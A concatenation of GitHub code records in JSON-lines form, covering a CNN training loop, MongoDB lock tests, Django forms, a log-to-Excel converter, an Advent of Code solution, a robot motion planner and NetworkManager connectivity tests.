cnn_train(model, train_loader, optimizer, epoch)\n cnn_test(model, test_loader, epoch)\n\n t2 = time.time()\n\n line = 'Time cost: {} seconds\\n'.format(int(t2 - t1))\n print(line, file=sys.stdout, flush=True)\n print(line, file=logfp, flush=True)\n\n scheduler.step()\n\n model_file = os.path.join(MODEL_DIR, \"cnn.epoch_%02d.pt\" % epoch)\n torch.save(model.state_dict(), model_file)\n\n logfp.close()\n\n\ndef determine_labels():\n\n labels = set()\n\n for filename in os.listdir(DATA_CROP_DIR):\n mat = re_dataset_filename.match(filename)\n assert mat is not None, filename\n ch = mat.group(3)\n labels.add(ch)\n\n labels = ''.join(sorted(labels))\n print(len(labels), labels)\n\n assert labels == '2345678abcdefghklmnpqrstuvwxy'\n\n\ndef main():\n # determine_labels()\n # build_train_test_set(train_size=0.8)\n train_model()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhongxinghong/PKUElectiveCaptcha2021Spring","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"3"} +{"seq_id":"29219149177","text":"import asyncio\nfrom datetime import timedelta\n\nimport pytest\n\nfrom maps.infra.sedem.machine.lib.lock import MongoLock, AlreadyLockedError\nfrom maps.infra.sedem.machine.tests.integration_tests.fixtures.machine_fixture import MachineFixture\nfrom maps.pylibs.fixtures.matchers import Match\n\n\nclass TestMongoLock:\n\n def test_lock_acquire(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_acquire(machine_fixture))\n\n def test_lock_reacquire(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_reacquire(machine_fixture))\n\n def test_lock_already_acquired(self, fixture_factory):\n machine_fixture: MachineFixture = fixture_factory(MachineFixture)\n machine_fixture.run_until_complete(self.async_test_lock_already_acquired(machine_fixture))\n\n async def async_test_lock_acquire(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0'):\n [lock] = await mongo.async_get_collection_documents(name='lock')\n\n assert lock == Match.HasItems({'lock_name': 'lock0'})\n\n cleared_locks = await mongo.async_get_collection_documents(name='lock')\n assert cleared_locks == []\n\n async def async_test_lock_reacquire(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0', ttl=timedelta(milliseconds=10)):\n [lock0] = await mongo.async_get_collection_documents(name='lock')\n await asyncio.sleep(0.1)\n async with MongoLock(db, lock_name='lock0'):\n [lock0_reacquired] = await mongo.async_get_collection_documents(name='lock')\n\n cleared_locks = await mongo.async_get_collection_documents(name='lock')\n assert cleared_locks == []\n\n assert lock0 == Match.HasItems({'lock_name': 'lock0'})\n assert lock0_reacquired == Match.HasItems({'lock_name': 'lock0'})\n assert lock0['expires_at'] < lock0_reacquired['locked_at']\n\n async def async_test_lock_already_acquired(self, machine_fixture):\n mongo = machine_fixture.mongo()\n db = mongo.db_instance()\n\n async with MongoLock(db, lock_name='lock0'):\n with pytest.raises(AlreadyLockedError):\n async with MongoLock(db, lock_name='lock0'):\n pass\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/integration_tests/mongo_lock_test.py","file_name":"mongo_lock_test.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36394460553","text":"from django import forms\nfrom .models import Contact\n\n\nclass ContactModelForm(forms.ModelForm):\n class Meta:\n model = Contact\n fields = ['email']\n widgets = {'email': forms.EmailInput(\n attrs={'style': \"outline: none; border: none; padding-top: 0px;padding-bottom: 0px;width: 100%;height: 100%;background-color: #DEECED;font-family: Lora, serif;padding-left: 23px;border:none\", 'class': '\"border-0\"', 'placeholder':\"E-mail\" }\n )}\n\n\nclass SendMailForm(forms.Form):\n _selected_action = forms.CharField(widget=forms.MultipleHiddenInput)\n message = forms.CharField(widget=forms.Textarea,required=False)","repo_name":"GlamorousCar/textiles","sub_path":"mail_sending/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32412222304","text":"# Standard Libraries\nfrom argparse import ArgumentParser\nfrom openpyxl import Workbook, worksheet\nfrom openpyxl.utils import get_column_letter\nfrom openpyxl.styles import PatternFill, Font\nimport os\nimport sys\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nEXIT_SUCCESS = 0\n\nPRINT_GROUP_FILLS = {\n \"GENERAL\" : PatternFill(start_color='FABF8F', fill_type='solid'),\n \"MEMORY\" : PatternFill(start_color='92CDDC', fill_type='solid'),\n \"INSTRUCTION\" : PatternFill(start_color='C4D79B', fill_type='solid'),\n \"ASSERT\" : PatternFill(start_color='C0504D', fill_type='solid')\n}\n\ndef stylize(sheet):\n \"\"\"Styles each cell\n\n :param worksheet sheet: Sheet to modify\n \n \"\"\"\n column_widths = []\n for row in sheet.iter_rows():\n # Determine the background color for this row\n try:\n background_color = PRINT_GROUP_FILLS[row[1].value]\n except KeyError:\n if row[1].value != \"Print Group\":\n logger.info(\"Background color not found for group %s. Consider adding one!\", row[1].value)\n background_color = PatternFill(start_color='FFFFFF', fill_type='solid')\n \n for i, cell in enumerate(row):\n cell.fill = background_color\n try:\n column_widths[i] = max(column_widths[i], len(str(cell.value)))\n except IndexError:\n column_widths.append(len(str(cell.value)))\n\n for i, column_width in enumerate(column_widths):\n # Add a little extra width with the 2\n sheet.column_dimensions[get_column_letter(i + 1)].width = column_width + 2\n\ndef convert_log_file(input_file_name, output_file_name):\n \"\"\"Converts a log file outputted by the program to an excel file\n\n :param str input_file_name: Name of the file to convert\n :param str output_file_name: Name of the file that will be outputted\n\n \"\"\"\n logger.info('Input file name: %s', input_file_name)\n logger.info('Output file name: %s', output_file_name)\n\n workbook = Workbook()\n sheet = workbook.active\n\n # Print the headers in the first row\n headers = ('Level', 'Print Group', 'File', 'Function', 'Line', 'Message')\n for i, header in enumerate(headers):\n sheet.cell(row=1, column=i+1).value = header\n sheet.cell(row=1, column=i+1).font = Font(bold=True)\n\n # Convert the lines in the debug file\n with open(input_file_name, 'r') as input_file:\n for line in input_file:\n entries = line.split(' : ', len(headers) - 1)\n if len(entries) < len(headers):\n logger.warning(\"Invalid formatting detected on line %s\", line)\n \n # Print the lines to the cells\n sheet.append(entries)\n logger.info(\"Dimensions of sheet: %s\", sheet.dimensions)\n\n # Apply style to cells\n stylize(sheet)\n\n # Add filters to the headers\n sheet.auto_filter.ref = sheet.dimensions\n\n workbook.save(filename=output_file_name)\n\ndef main():\n argument_parser = ArgumentParser(\n prog='python log_file_converter.py log_file',\n description='Converts a log file to a formatted excel file'\n )\n argument_parser.add_argument('log_files', nargs='+')\n argument_parser.add_argument('--in_place', action='store_true', help='Saves the file in the location of this script')\n argument_parser.add_argument('--verbose', '-v', action='store_true')\n args = argument_parser.parse_args()\n\n for log_file in args.log_files:\n if not os.path.isfile(log_file):\n raise ValueError(\"File %s does not exist\", log_file)\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n if os.path.splitext(log_file)[1] != '.log':\n logger.warning(\"A file with extension .log is expected. Resulting file may be incorrect\")\n\n if args.in_place:\n output_file_name = os.path.splitext(os.path.basename(log_file))[0] + '.xlsx'\n else:\n output_file_name = os.path.splitext(log_file)[0] + '.xlsx'\n logger.info(\"Absolute path of output file here: %s\", os.path.abspath(output_file_name))\n\n convert_log_file(log_file, output_file_name)\n\n logger.info(\"Log file conversion complete: SUCCESS\")\n\n return EXIT_SUCCESS\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"KaravolisL/ARM-ISA-Simulator","sub_path":"scripts/log_file_converter.py","file_name":"log_file_converter.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11959100422","text":"from itertools import cycle\nfrom functools import cache\nfrom collections import defaultdict\nimport heapq\nfrom txt_input.filepath import get_text\n\n@cache\ndef move_track(pos: int, roll: int) -> int:\n return (pos + roll - 1) % 10 + 1\n\ntrack_pos = [int(x.split()[-1]) for x in get_text('day21.txt').splitlines()]\ntrack_pos_copy = tuple(track_pos)\nscores = [0, 0]\nnum_rolls = 0\n# Each roll is increased by 3 each turn, so the total sum decreases by 1 (9 == -1 mod 10)\ndeterministic_die = cycle([6, 5, 4, 3, 2, 1, 0, 9, 8, 7])\n\nwhile scores[1 - num_rolls % 2] < 1000:\n track_pos[num_rolls % 2] = move_track(track_pos[num_rolls % 2], next(deterministic_die))\n scores[num_rolls % 2] += track_pos[num_rolls % 2]\n num_rolls += 1\n\nprint(min(scores) * num_rolls * 3)\n\ntot_score1 = tot_score2 = 0\ndirac_dice = {3: 1, 4: 3, 5: 6, 6: 7, 7: 6, 8: 3, 9: 1}\nscore_heap = [[0, 0, 0]]\npos_lookup = defaultdict(lambda: defaultdict(int))\npos_lookup[(0, 0)][track_pos_copy] = 1\n\ndef add_roll(pos: int):\n for roll, freq in dirac_dice.items():\n yield move_track(pos, roll), freq\n\nwhile score_heap:\n _, score1, score2 = heapq.heappop(score_heap)\n for (pos1, pos2), freq in pos_lookup[(score1, score2)].items():\n for new_pos1, freq1 in add_roll(pos1):\n new_score1 = score1 + new_pos1\n if new_score1 > 20:\n tot_score1 += freq * freq1\n continue\n for new_pos2, freq2 in add_roll(pos2):\n new_score2 = score2 + new_pos2\n if new_score2 > 20:\n tot_score2 += freq * freq1 * freq2\n continue\n if (new_score1 + new_score2, new_score1, new_score2) not in score_heap:\n heapq.heappush(score_heap, (new_score1 + new_score2, new_score1, new_score2))\n pos_lookup[(new_score1, new_score2)][(new_pos1, new_pos2)] += freq * freq1 * freq2\n\nprint(max(tot_score1, tot_score2))\n","repo_name":"alexjusung1/advent_2021","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7153910387","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .quadruped.quadruped_wrapper import QuadrupedWrapper\nfrom pysolver import *\nfrom pysolverlqr import *\n\nfrom pymomentum import *\nfrom momentumopt.kinoptpy.momentum_kinematics_optimizer import MomentumKinematicsOptimizer, EndeffectorTrajectoryGenerator, JointTrajectoryGenerator\nfrom momentumopt.kinoptpy.create_data_file import create_file, create_qp_files, create_lqr_files\n\ndef create_time_vector(dynamics_sequence):\n num_time_steps = len(dynamics_sequence.dynamics_states)\n # Create time vector\n time = np.zeros((num_time_steps))\n time[0] = dynamics_sequence.dynamics_states[0].dt\n for i in range(num_time_steps - 1):\n time[i + 1] = time[i] + dynamics_sequence.dynamics_states[i].dt\n\n return time\n\n\nclass MotionPlanner():\n\n def __init__(self, cfg_file, KinOpt=MomentumKinematicsOptimizer,\n RobotWrapper=QuadrupedWrapper, with_lqr=True):\n 'define problem configuration'\n self.planner_setting = PlannerSetting()\n self.planner_setting.initialize(cfg_file)\n\n self.dynlqr_setting = SolverLqrSetting()\n self.dynlqr_setting.initialize(cfg_file, \"solverlqr_dynamics\")\n\n 'define robot initial state'\n self.ini_state = DynamicsState()\n self.ini_state.fillInitialRobotState(cfg_file)\n\n 'define reference dynamic sequence'\n #self.kin_sequence = KinematicsSequence()\n #self.kin_sequence.resize(self.planner_setting.get(PlannerIntParam_NumTimesteps),\n # self.planner_setting.get(PlannerIntParam_NumDofs))\n\n 'define terrain description'\n self.terrain_description = TerrainDescription()\n self.terrain_description.loadFromFile(self.planner_setting.get(PlannerStringParam_ConfigFile))\n\n 'define contact plan'\n self.contact_plan = ContactPlanFromFile()\n self.contact_plan.initialize(self.planner_setting)\n self.contact_plan.optimize(self.ini_state, self.terrain_description)\n\n 'optimize motion'\n self.dyn_optimizer = DynamicsOptimizer()\n self.dyn_optimizer.initialize(self.planner_setting)\n\n 'Kinematics Optimizer'\n self.kin_optimizer = KinOpt()\n self.kin_optimizer.initialize(self.planner_setting, RobotWrapper=RobotWrapper)\n\n self.dynamics_feedback = None\n self.with_lqr = with_lqr\n\n self._init_from_settings()\n\n def _init_from_settings(self):\n kin_optimizer = self.kin_optimizer\n inv_kin = kin_optimizer.inv_kin\n etg = kin_optimizer.endeff_traj_generator\n etg.z_offset = self.planner_setting.get(PlannerDoubleParam_SwingTrajViaZ)\n\n inv_kin.w_lin_mom_tracking = self.planner_setting.get(PlannerDoubleParam_WeightLinMomentumTracking)\n inv_kin.w_ang_mom_tracking = self.planner_setting.get(PlannerDoubleParam_WeightAngMomentumTracking)\n inv_kin.w_endeff_contact = self.planner_setting.get(PlannerDoubleParam_WeightEndEffContact)\n inv_kin.w_endeff_tracking = self.planner_setting.get(PlannerDoubleParam_WeightEndEffTracking)\n inv_kin.p_endeff_tracking = self.planner_setting.get(PlannerDoubleParam_PGainEndEffTracking)\n inv_kin.p_com_tracking = self.planner_setting.get(PlannerDoubleParam_PGainComTracking)\n inv_kin.w_joint_regularization = self.planner_setting.get(PlannerDoubleParam_WeightJointReg)\n kin_optimizer.reg_orientation = self.planner_setting.get(PlannerDoubleParam_PGainOrientationTracking)\n\n def optimize_dynamics(self, kd_iter):\n print(\"DynOpt\", kd_iter)\n start = time.time()\n self.dyn_optimizer.optimize(self.ini_state, self.contact_plan,\n self.kin_optimizer.kinematics_sequence, kd_iter > 0)\n print(\"Dynopt - \" , time.time() -start)\n\n def optimize_kinematics(self, kd_iter, plotting=False):\n print(\"KinOpt\", kd_iter)\n start = time.time()\n self.kin_optimizer.optimize(self.ini_state, self.contact_plan.contactSequence(),\n self.dyn_optimizer.dynamicsSequence(), plotting=plotting)\n print(\"kinopt - \", time.time() - start)\n\n def optimize_dynamics_feedback(self):\n # 'define dynamics feedback controller'\n # '''\n # Access feedback gains using: dynamics_feedback.forceGain(time_id)\n # [currentCOM - desiredCoM ]\n # deltaForce = forceGain * [currentLMOM - desiredLMOM]\n # [currentAMOM - desiredAMOM]\n #\n # Torque = PD(q,qdot) + J^T * (plannedForce + deltaForce)\n # Remember that plannedForce of dyn_optimizer is normalized by robot weight\n # (self.planner_setting.get(PlannerDoubleParam_RobotWeight)),\n # so you need to multiply it by that amount for it to work!\n # deltaForce comes already in the right units.\n # '''\n self.dynamics_feedback = DynamicsFeedback()\n self.dynamics_feedback.initialize(self.dynlqr_setting, self.planner_setting)\n self.dynamics_feedback.optimize(self.ini_state, self.dyn_optimizer.dynamicsSequence())\n\n def _plot_show(self, plot_show):\n if plot_show:\n plt.show()\n else:\n plt.draw()\n plt.pause(0.001)\n\n def plot_centroidal(self):\n fig, axes = plt.subplots(3, 1, figsize=(6, 8), sharex=True)\n\n dynseq = self.dyn_optimizer.dynamicsSequence()\n kinseq = self.kin_optimizer.kinematics_sequence\n\n for i, (ax, prop) in enumerate(zip(axes, ['com', 'lmom', 'amom'])):\n data_dyn = np.array([getattr(ds, prop) for ds in dynseq.dynamics_states])\n data_kin = np.array([getattr(ds, prop) for ds in kinseq.kinematics_states])\n\n for dyn, kin, label in zip(data_dyn.T, data_kin.T, ['{}_{}'.format(prop, d) for d in ['x', 'y', 'z']]):\n line = ax.plot(dyn, label=label, alpha=0.75)[0]\n ax.plot(kin, '--', color=line.get_color())[0]\n\n ax.legend()\n ax.grid(True)\n\n fig.suptitle('Centroidal info for dyn (-) and kin (--)')\n fig.tight_layout(rect=[0, 0, 1., 0.95])\n plt.show()\n\n return fig, axes\n\n def plot_foot_traj(self, plot_show=True):\n fig, ax = plt.subplots(4,1)\n des_ee_traj = EndeffectorTrajectoryGenerator()\n des_ee_traj.z_offset = self.planner_setting.get(PlannerDoubleParam_SwingTrajViaZ)\n des_ee_pos = des_ee_traj(self.kin_optimizer)[0]\n foot_traj = self.kin_optimizer.motion_eff['trajectory']\n for i in range(4):\n ax[i].plot(foot_traj[:,3*i+2], label = \"act\")\n # ax[i].plot(foot_traj[:,3*i+1])\n # ax[i].plot(foot_traj[:,3*i])\n ax[i].plot(des_ee_pos[:,i,2], label = \"des\")\n # ax[i].plot(des_ee_pos[:,i,1])\n # ax[i].plot(des_ee_pos[:,i,0])\n ax[i].set_ylabel(\"m\")\n ax[i].set_xlabel(\"t [ms]\")\n ax[i].legend()\n ax[i].grid(True)\n fig.suptitle('Desired and actual foot trajectory')\n self._plot_show(plot_show)\n\n\n def replay_kinematics(self, start=0, end=None):\n self.kin_optimizer.robot.ensureDisplay()\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n self.kin_optimizer.robot.display(np.matrix(q).T)\n time.sleep(self.kin_optimizer.dt)\n\n def plot_base_trajecory(self, start=0, end=None):\n q_app = np.zeros([1,self.kin_optimizer.robot.model.nq])\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n q_app = np.append(q_app,q.reshape(1,len(q)),axis=0)\n fig, ax = plt.subplots(3,1)\n label = [\"base_x\",\"base_y\",\"base_z\"]\n for i in range(3):\n ax[i].plot(q_app[1:end,i], label = label[i])\n ax[i].set_ylabel(\"m\")\n ax[i].set_xlabel(\"t [ms]\")\n ax[i].legend()\n ax[i].grid(True)\n plt.show()\n\n def plot_joint_trajecory(self, start=0, end=None,\n plot_show=True, fig_suptitle=''):\n q_app = np.zeros([1,self.kin_optimizer.robot.model.nq])\n for ks in self.kin_optimizer.kinematics_sequence.kinematics_states[start:end]:\n q = ks.robot_posture.generalized_joint_positions\n q_app = np.append(q_app,q.reshape(1,len(q)),axis=0)\n fig, ax = plt.subplots(8,1)\n for i in range(8):\n ax[i].plot(q_app[1:end,i+7])\n ax[i].plot(self.kin_optimizer.joint_des[i,:])\n ax[i].set_ylabel(\"m\")\n ax[i].legend()\n ax[i].grid(True)\n self._plot_show(plot_show)\n\n\n def plot_com_motion(self, dynamics_states, kinematics_states,\n plot_show=True, fig_suptitle=''):\n fig, axes = plt.subplots(3, 3, figsize=(12, 8), sharex=True)\n axes = np.array(axes)\n\n def states_to_vec(states):\n com = np.vstack([s.com for s in states])\n lmom = np.vstack([s.lmom for s in states])\n amom = np.vstack([s.amom for s in states])\n return com, lmom, amom\n\n\n for i, (title, dyn, kin) in enumerate(zip(\n ['com', 'lmom', 'amom'],\n states_to_vec(dynamics_states),\n states_to_vec(kinematics_states))):\n\n axes[0, i].set_title(title)\n\n for j in range(3):\n axes[j, i].plot(dyn[:, j], label='dynamic')\n axes[j, i].plot(kin[:, j], label='kinematic')\n\n [ax.grid(True) for ax in axes.reshape(-1)]\n\n for i, label in enumerate(['x', 'y', 'z']):\n axes[i, 0].set_ylabel(label + ' [m]')\n axes[2, i].set_xlabel('time steps [5ms]')\n\n axes[0, 2].legend()\n\n if fig_suptitle:\n fig.suptitle(fig_suptitle)\n\n self._plot_show(plot_show)\n\n def save_files(self):\n time_vector = create_time_vector(self.dyn_optimizer.dynamicsSequence())\n create_file(time_vector,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n if self.with_lqr:\n create_lqr_files(time_vector,\n self.kin_optimizer.motion_eff,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n def save_qp_files(self):\n time_vector = create_time_vector(self.dyn_optimizer.dynamicsSequence())\n create_qp_files(time_vector,\n self.kin_optimizer.motion_eff,\n self.kin_optimizer.kinematics_sequence,\n self.dyn_optimizer.dynamicsSequence(),\n self.dynamics_feedback,\n self.planner_setting.get(PlannerDoubleParam_RobotWeight))\n\n def time_vector(self):\n return create_time_vector(self.dyn_optimizer.dynamicsSequence())\n\n def optimize_motion(self, plot_com_motion=True):\n dyn_optimizer = self.dyn_optimizer\n kin_optimizer = self.kin_optimizer\n\n self.optimize_dynamics(0)\n for kd_iter in range(0, self.planner_setting.get(PlannerIntParam_KinDynIterations)):\n self.optimize_kinematics(kd_iter + 1, plotting=False)\n self.optimize_dynamics(kd_iter + 1)\n optimized_kin_plan = self.kin_optimizer.kinematics_sequence\n optimized_dyn_plan = self.dyn_optimizer.dynamicsSequence()\n\n if plot_com_motion:\n self.plot_com_motion(optimized_dyn_plan.dynamics_states,\n optimized_kin_plan.kinematics_states, plot_show=False,\n fig_suptitle='kd_iter={}'.format(kd_iter))\n\n optimized_kin_plan = kin_optimizer.kinematics_sequence\n optimized_dyn_plan = dyn_optimizer.dynamicsSequence()\n\n time_vector = create_time_vector(dyn_optimizer.dynamicsSequence())\n\n if self.with_lqr:\n self.optimize_dynamics_feedback()\n return optimized_kin_plan, kin_optimizer.motion_eff, \\\n optimized_dyn_plan, self.dynamics_feedback, \\\n self.planner_setting, time_vector\n","repo_name":"wxmerkt/kino_dynamic_opt","sub_path":"momentumopt/python/momentumopt/motion_planner.py","file_name":"motion_planner.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"23872072175","text":"\"\"\"Test network manager.\"\"\"\nimport asyncio\nfrom ipaddress import IPv4Address, IPv6Address\nfrom unittest.mock import AsyncMock, patch\n\nfrom dbus_fast import Variant\nimport pytest\n\nfrom supervisor.const import CoreState\nfrom supervisor.coresys import CoreSys\nfrom supervisor.dbus.const import InterfaceMethod\nfrom supervisor.exceptions import HostNotSupportedError\nfrom supervisor.homeassistant.const import WSEvent, WSType\nfrom supervisor.host.const import WifiMode\n\nfrom tests.dbus_service_mocks.base import DBusServiceMock\nfrom tests.dbus_service_mocks.network_active_connection import (\n ActiveConnection as ActiveConnectionService,\n)\nfrom tests.dbus_service_mocks.network_connection_settings import (\n SETTINGS_FIXTURE,\n ConnectionSettings as ConnectionSettingsService,\n)\nfrom tests.dbus_service_mocks.network_device_wireless import (\n DeviceWireless as DeviceWirelessService,\n)\nfrom tests.dbus_service_mocks.network_manager import (\n NetworkManager as NetworkManagerService,\n)\n\n\n@pytest.fixture(name=\"active_connection_service\")\nasync def fixture_active_connection_service(\n network_manager_services: dict[str, DBusServiceMock | dict[str, DBusServiceMock]]\n) -> ActiveConnectionService:\n \"\"\"Return mock active connection service.\"\"\"\n yield network_manager_services[\"network_active_connection\"]\n\n\n@pytest.fixture(name=\"wireless_service\")\nasync def fixture_wireless_service(\n network_manager_services: dict[str, DBusServiceMock | dict[str, DBusServiceMock]]\n) -> DeviceWirelessService:\n \"\"\"Return mock device wireless service.\"\"\"\n yield network_manager_services[\"network_device_wireless\"]\n\n\nasync def test_load(coresys: CoreSys, network_manager_service: NetworkManagerService):\n \"\"\"Test network manager load.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n network_manager_service.CheckConnectivity.calls.clear()\n\n await coresys.host.network.load()\n\n assert coresys.host.network.connectivity is True\n\n assert len(coresys.host.network.dns_servers) == 1\n assert str(coresys.host.network.dns_servers[0]) == \"192.168.30.1\"\n\n assert len(coresys.host.network.interfaces) == 2\n name_dict = {intr.name: intr for intr in coresys.host.network.interfaces}\n assert \"eth0\" in name_dict\n assert name_dict[\"eth0\"].mac == \"AA:BB:CC:DD:EE:FF\"\n assert name_dict[\"eth0\"].enabled is True\n assert name_dict[\"eth0\"].ipv4.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv4.gateway == IPv4Address(\"192.168.2.1\")\n assert name_dict[\"eth0\"].ipv4.ready is True\n assert name_dict[\"eth0\"].ipv6.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv6.gateway == IPv6Address(\"fe80::da58:d7ff:fe00:9c69\")\n assert name_dict[\"eth0\"].ipv6.ready is True\n assert \"wlan0\" in name_dict\n assert name_dict[\"wlan0\"].enabled is False\n\n assert network_manager_service.ActivateConnection.calls == [\n (\n \"/org/freedesktop/NetworkManager/Settings/1\",\n \"/org/freedesktop/NetworkManager/Devices/1\",\n \"/\",\n )\n ]\n assert network_manager_service.CheckConnectivity.calls == []\n\n\nasync def test_load_with_disabled_methods(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n connection_settings_service: ConnectionSettingsService,\n):\n \"\"\"Test load does not disable methods of interfaces.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n\n disabled = {\"method\": Variant(\"s\", \"disabled\")}\n connection_settings_service.settings = SETTINGS_FIXTURE | {\n \"ipv4\": disabled,\n \"ipv6\": disabled,\n }\n await coresys.dbus.network.get(\"eth0\").settings.reload()\n\n await coresys.host.network.load()\n assert network_manager_service.ActivateConnection.calls == []\n\n\nasync def test_load_with_network_connection_issues(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n active_connection_service: ActiveConnectionService,\n):\n \"\"\"Test load does not update interfaces with network connection issues.\"\"\"\n network_manager_service.ActivateConnection.calls.clear()\n\n active_connection_service.emit_properties_changed(\n {\"StateFlags\": 0x10, \"Ip4Config\": \"/\"}\n )\n await active_connection_service.ping()\n\n await coresys.host.network.load()\n\n assert network_manager_service.ActivateConnection.calls == []\n assert len(coresys.host.network.interfaces) == 2\n name_dict = {intr.name: intr for intr in coresys.host.network.interfaces}\n assert \"eth0\" in name_dict\n assert name_dict[\"eth0\"].enabled is True\n assert name_dict[\"eth0\"].ipv4.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv4.gateway is None\n assert name_dict[\"eth0\"].ipv6.method == InterfaceMethod.AUTO\n assert name_dict[\"eth0\"].ipv6.gateway == IPv6Address(\"fe80::da58:d7ff:fe00:9c69\")\n\n\nasync def test_scan_wifi(coresys: CoreSys):\n \"\"\"Test scanning wifi.\"\"\"\n with pytest.raises(HostNotSupportedError):\n await coresys.host.network.scan_wifi(coresys.host.network.get(\"eth0\"))\n\n with patch(\"supervisor.host.network.asyncio.sleep\"):\n aps = await coresys.host.network.scan_wifi(coresys.host.network.get(\"wlan0\"))\n\n assert len(aps) == 2\n assert aps[0].mac == \"E4:57:40:A9:D7:DE\"\n assert aps[0].mode == WifiMode.INFRASTRUCTURE\n assert aps[1].mac == \"18:4B:0D:23:A1:9C\"\n assert aps[1].mode == WifiMode.INFRASTRUCTURE\n\n\nasync def test_scan_wifi_with_failures(\n coresys: CoreSys, wireless_service: DeviceWirelessService, caplog\n):\n \"\"\"Test scanning wifi with accesspoint processing failures.\"\"\"\n wireless_service.all_access_points = [\n \"/org/freedesktop/NetworkManager/AccessPoint/43099\",\n \"/org/freedesktop/NetworkManager/AccessPoint/43100\",\n \"/org/freedesktop/NetworkManager/AccessPoint/99999\",\n ]\n\n with patch(\"supervisor.host.network.asyncio.sleep\"):\n aps = await coresys.host.network.scan_wifi(coresys.host.network.get(\"wlan0\"))\n\n assert len(aps) == 2\n assert \"Can't process an AP\" in caplog.text\n\n\nasync def test_host_connectivity_changed(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n ha_ws_client: AsyncMock,\n):\n \"\"\"Test host connectivity changed.\"\"\"\n await coresys.host.load()\n assert coresys.host.network.connectivity is True\n\n network_manager_service.emit_properties_changed({\"Connectivity\": 1})\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is False\n await asyncio.sleep(0)\n assert {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": False},\n },\n } in [call.args[0] for call in ha_ws_client.async_send_command.call_args_list]\n\n ha_ws_client.async_send_command.reset_mock()\n network_manager_service.emit_properties_changed({}, [\"Connectivity\"])\n await network_manager_service.ping()\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is True\n await asyncio.sleep(0)\n assert {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": True},\n },\n } in [call.args[0] for call in ha_ws_client.async_send_command.call_args_list]\n\n\nasync def test_host_connectivity_disabled(\n coresys: CoreSys,\n network_manager_service: NetworkManagerService,\n ha_ws_client: AsyncMock,\n):\n \"\"\"Test host connectivity check disabled.\"\"\"\n await coresys.host.network.load()\n\n coresys.core.state = CoreState.RUNNING\n await asyncio.sleep(0)\n ha_ws_client.async_send_command.reset_mock()\n\n assert \"connectivity_check\" not in coresys.resolution.unsupported\n assert coresys.host.network.connectivity is True\n\n network_manager_service.emit_properties_changed({\"ConnectivityCheckEnabled\": False})\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is None\n await asyncio.sleep(0)\n ha_ws_client.async_send_command.assert_any_call(\n {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": None},\n },\n }\n )\n assert \"connectivity_check\" in coresys.resolution.unsupported\n\n ha_ws_client.async_send_command.reset_mock()\n network_manager_service.emit_properties_changed({\"ConnectivityCheckEnabled\": True})\n await network_manager_service.ping()\n await network_manager_service.ping()\n assert coresys.host.network.connectivity is True\n await asyncio.sleep(0)\n ha_ws_client.async_send_command.assert_any_call(\n {\n \"type\": WSType.SUPERVISOR_EVENT,\n \"data\": {\n \"event\": WSEvent.SUPERVISOR_UPDATE,\n \"update_key\": \"network\",\n \"data\": {\"host_internet\": True},\n },\n }\n )\n assert \"connectivity_check\" not in 